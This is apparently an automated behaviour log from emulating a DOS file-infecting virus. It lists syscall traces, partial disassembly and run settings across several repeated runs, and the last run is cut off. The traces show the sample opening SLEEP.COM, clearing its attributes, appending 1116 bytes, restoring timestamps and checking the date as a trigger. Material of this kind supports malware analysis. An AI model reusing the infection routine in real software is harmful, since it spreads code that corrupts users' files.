Time Syscall Op Syscall Name
2018-12-25T12:30:43.50071438Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:43.504551886Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:43.507522992Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:43.508898576Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:43.523246315Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:43.530458826Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:43.537450095Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:43.540101119Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:43.557831491Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:43.559715675Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:43.567708828Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:43.580041285Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:43.583977895Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:43.58677317Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:43.589369703Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:43.599874121Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:43.603023934Z 62 PC: 12d05 | Close file
2018-12-25T12:30:43.610032631Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:43.617219626Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:43.619458209Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:43.625504772Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:43.62992377Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:43.631556249Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:43.639362906Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:43.641436633Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:43.648909433Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:43.652767694Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:43.65613046Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:43.659254027Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:43.661864822Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:43.672457496Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:43.674247579Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:43.683057122Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:43.69545691Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:43.699030484Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:43.707394027Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:43.715742938Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:43.718461082Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:43.732730942Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:43.736156535Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:43.744948504Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:43.748479375Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:43.752319822Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:43.755178806Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:43.757450417Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:43.76745379Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:43.768996918Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:43.777259404Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:43.791102267Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:43.793269465Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:43.796857726Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:43.67615633Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:43.680845547Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:43.685939541Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:43.687568619Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:43.694730952Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:43.702416343Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:43.710363476Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:43.712966371Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:43.734149805Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:43.736743859Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:43.747593399Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:43.756412127Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:43.759401176Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:43.762300012Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:43.766842389Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:43.77795124Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:43.779899167Z 62 PC: 12d05 | Close file
2018-12-25T12:30:43.796818075Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:43.808385051Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:43.811534322Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:43.819990884Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:43.827472783Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:43.829924098Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:43.841433724Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:43.843937408Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:43.850935727Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:43.854064206Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:43.85821611Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:43.862827922Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:43.865278117Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:43.880262054Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:43.88192902Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:43.890764664Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:43.903118645Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:43.906006268Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:43.913302663Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:43.920995476Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:43.923403224Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:44.081743349Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:44.083563385Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:44.088986355Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:44.091849113Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:44.095700874Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:44.100147568Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:44.102622301Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:44.123640028Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:44.126822677Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:44.165594312Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:44.181354811Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:44.184726103Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:44.190124248Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:44.111024272Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:44.114621264Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:44.118927869Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:44.11993639Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:44.126649664Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:44.134538196Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:44.141465382Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:44.14354327Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:44.997282471Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:44.999445844Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:45.007025161Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:45.011915169Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:45.013809851Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:45.01567551Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:45.017314417Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:45.121396275Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:45.123229008Z 62 PC: 12d05 | Close file
2018-12-25T12:30:45.308297145Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:45.394905028Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:45.398307796Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:45.407026453Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:45.41609648Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:45.418898651Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:45.520714323Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:45.52402322Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:45.53208343Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:45.535411415Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:45.538685188Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:45.542071417Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:45.544386468Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:45.700164484Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:45.702107181Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:45.814258845Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:45.934284295Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:45.941839208Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:45.949991946Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:45.957922547Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:45.961553153Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:46.033036044Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:46.035122948Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:46.043796063Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:46.046822968Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:46.049926847Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:46.054276527Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:46.056419165Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:46.173369478Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:46.180039375Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:46.31609366Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:46.477744677Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:46.485531409Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:46.48887567Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:44.702845803Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:44.706826818Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:44.712163062Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:44.713643561Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:44.720428575Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:44.727320648Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:44.733892073Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:44.736743607Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:44.753456646Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:44.75529567Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:44.761818574Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:44.765253134Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:44.76820051Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:44.771165457Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:44.774075838Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:44.802651896Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:44.804499289Z 62 PC: 12d05 | Close file
2018-12-25T12:30:44.813351169Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:44.823170423Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:44.826022666Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:44.833357736Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:44.839771039Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:44.84195453Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:44.853009185Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:44.855232254Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:44.861898049Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:44.865857192Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:44.868543267Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:44.871322728Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:44.873601085Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:44.891458745Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:44.893151425Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:44.900745806Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:44.911607154Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:44.91413046Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:44.921024408Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:44.928170021Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:44.930819808Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:44.94104705Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:44.943888192Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:44.95093019Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:44.954040841Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:44.957487485Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:44.960057528Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:44.961897369Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:44.971128162Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:44.973055415Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:44.981432547Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:44.992820306Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:44.995398601Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:45.000071431Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:44.955265002Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:44.958733254Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:44.963788599Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:44.965217409Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:44.972583178Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:44.980465042Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:44.987591703Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:44.990017036Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:46.030265846Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:46.033338816Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:46.041272337Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:46.04940815Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:46.052590253Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:46.055402383Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:46.057825159Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:46.173723991Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:46.175895128Z 62 PC: 12d05 | Close file
2018-12-25T12:30:46.317377751Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:46.477769888Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:46.481216011Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:46.489071566Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:46.497050746Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:46.498989267Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:46.64231477Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:46.64604122Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:46.654474957Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:46.658017369Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:46.662738976Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:46.666075064Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:46.668758155Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:46.687710739Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:46.689120875Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:46.702346487Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:46.722750431Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:46.725135149Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:46.731955138Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:46.737261624Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:46.739249975Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:46.753417619Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:46.755348569Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:46.769574238Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:46.776684861Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:46.779407768Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:46.782686892Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:46.78465252Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:46.820679151Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:46.823018223Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:46.856377202Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:46.886912732Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:46.890698055Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:46.896016526Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:45.262691905Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:45.26680358Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:45.271061953Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:45.2724345Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:45.278652605Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:45.285466367Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:45.292574306Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:45.294965308Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:45.311402687Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:45.313576224Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
